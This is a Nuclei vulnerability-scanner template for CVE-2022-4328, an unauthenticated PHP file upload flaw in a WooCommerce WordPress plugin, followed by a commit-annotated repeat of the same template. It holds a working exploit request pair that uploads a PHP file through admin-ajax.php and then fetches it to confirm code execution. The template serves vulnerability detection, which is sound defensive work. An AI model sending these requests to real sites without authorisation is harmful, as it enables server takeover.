nuclei-templates/http/cves/2022/CVE-2022-4328.yaml

id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  remediation: Fixed in version 18.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.96022
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    framework: wordpress
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
  tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("CVE-2022-4328"); ?>

        --------------------------22728be7b3104597--
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - fe5df26ce4ca0056ffae8854469c282f

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
templates added 2023-05-06 12:12:20 +00:00			`id: CVE-2022-4328`

			`info:`
			`name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.`
			`reference:`
			`- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed`
			`- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-4328`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`remediation: Fixed in version 18.0`
templates added 2023-05-06 12:12:20 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-4328`
			`cwe-id: CWE-434`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.96022`
			`cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager::::::wordpress::*`
templates added 2023-05-06 12:12:20 +00:00			`metadata:`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`max-request: 2`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`framework: wordpress`
			`vendor: najeebmedia`
			`product: woocommerce_checkout_field_manager`
			`tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive`
templates added 2023-05-06 12:12:20 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597`

			`--------------------------22728be7b3104597`
			`Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"`
			`Content-Type: application/octet-stream`

			`<?php echo md5("CVE-2022-4328"); ?>`

			`--------------------------22728be7b3104597--`
			`- \|`
			`GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- fe5df26ce4ca0056ffae8854469c282f`
templates added 2023-05-06 12:12:20 +00:00
			`- type: word`
			`part: header`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- text/html`
templates added 2023-05-06 12:12:20 +00:00
			`- type: status`
			`status:`
			`- 200`